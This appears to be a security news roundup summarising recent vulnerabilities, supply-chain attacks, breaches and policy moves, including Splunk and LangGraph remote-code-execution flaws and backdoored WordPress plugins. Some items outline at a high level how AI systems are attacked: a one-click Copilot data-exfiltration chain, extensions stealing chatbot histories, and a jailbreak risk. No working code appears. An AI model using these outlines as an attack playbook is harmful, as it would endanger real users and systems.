Splunk pre-auth RCE, OptinMonster 1.2M sites backdoored

Splunk Enterprise versions 10+ on AWS ship with an enabled PostgreSQL Sidecar Service that lets unauthenticated attackers execute code remotely (CVE‑2026‑20253, CVSS 9.8). The flaw bypasses the web proxy and hits the sidecar endpoint directly, meaning default cloud deployments are exploitable out of the box. Patch or disable the sidecar to stop pre‑auth RCE.

Sansec uncovered a supply‑chain attack that hijacked the CDN of Awesome Motive's OptinMonster, TrustPulse and PushEngage plugins, injecting malicious JavaScript that creates hidden admin accounts on 1.2 million WordPress sites. The backdoor activates only for logged‑in admins, giving attackers full control and exposing the broader plugin ecosystem.

Varonis Threat Labs discovered SearchLeak, a three‑stage chain in M365 Copilot Enterprise Search that turns a malicious link into a silent data exfiltration tool, stealing emails, files, and calendar items with a single click. Microsoft assigned it CVE‑2026‑42824, rated critical, and has released a patch.

Check Point Research uncovered three chained flaws in LangGraph's SQLite checkpointer, starting with CVE‑2025‑67644, an SQL injection via a metadata filter. The injection lets an attacker inject malicious SQL that leads to arbitrary deserialization and full remote code execution, jeopardizing any system using LangGraph's persistence layer.

A disgruntled zero‑day researcher, calling themselves Nightmare, has released six unpatched Windows exploits, three already weaponised, and vowed a "bone‑shattering" dump on July 14. Microsoft responded by involving law enforcement, accusing the researcher of breach of coordination, sparking a rare public feud that could chill future vulnerability disclosures.

Two Chrome extensions posing as ad blockers have been siphoning full chat histories from ChatGPT, Claude, Gemini and five other AI services from roughly 90,000 users. The malicious code captures prompts, responses, model details and subscription status, then exfiltrates the data to operator-controlled servers, revealing a sophisticated data‑theft operation.

The FBI, Google and Black Lotus Labs took down Outsider Enterprise, a China‑based AI‑driven phishing‑as‑a‑service that operated over 9,000 fake sites and more than a million URLs, stealing 3.8 million credit cards and causing $1.9 billion in losses. The takedown seized servers, a Shopify store, $100k USDT and a Telegram bot, and Google filed a civil suit to block future scams.

Researchers found the Atomic Arch campaign hijacking abandoned Arch User Repository packages. By swapping PKGBUILDs to pull in the malicious npm module atomic-lockfile, attackers install a Linux payload with eBPF-based rootkit capabilities, potentially affecting up to 1,500 downstream packages. The move shows how supply-chain trust can be subverted without writing new code.

France’s official encrypted messaging service Tchap was compromised on June 7, 2026 after a malicious actor hijacked a user account. The breach exposed personal data for 73,467 public‑sector users and gave the attacker access to public‑room messages, underscoring the risk of relying on single‑sign‑on accounts for secure communications.

Anthropic announced it must abruptly disable its Fable 5 and Mythos 5 models for all users after a U.S. export‑control directive barred foreign nationals from accessing them. The government cited a narrow jailbreak risk, marking the first time export controls target AI models rather than chips, and raising the stakes for AI security tools worldwide.

The FCC proposal would force carriers to collect government ID and address for every prepaid line, effectively ending burner phones. Advocates warn the blanket data sweep mirrors authoritarian practices and could expose users to surveillance, while the agency claims it’s needed to curb scams.

A DPRK-linked actor, dubbed FAMOUS CHOLLIMA, posts fake job ads on Google Docs to lure developers into installing credential‑stealing malware. The blog details how to hunt these Docs via urlscan and a custom index, revealing long‑lived accounts and reused assets across campaigns.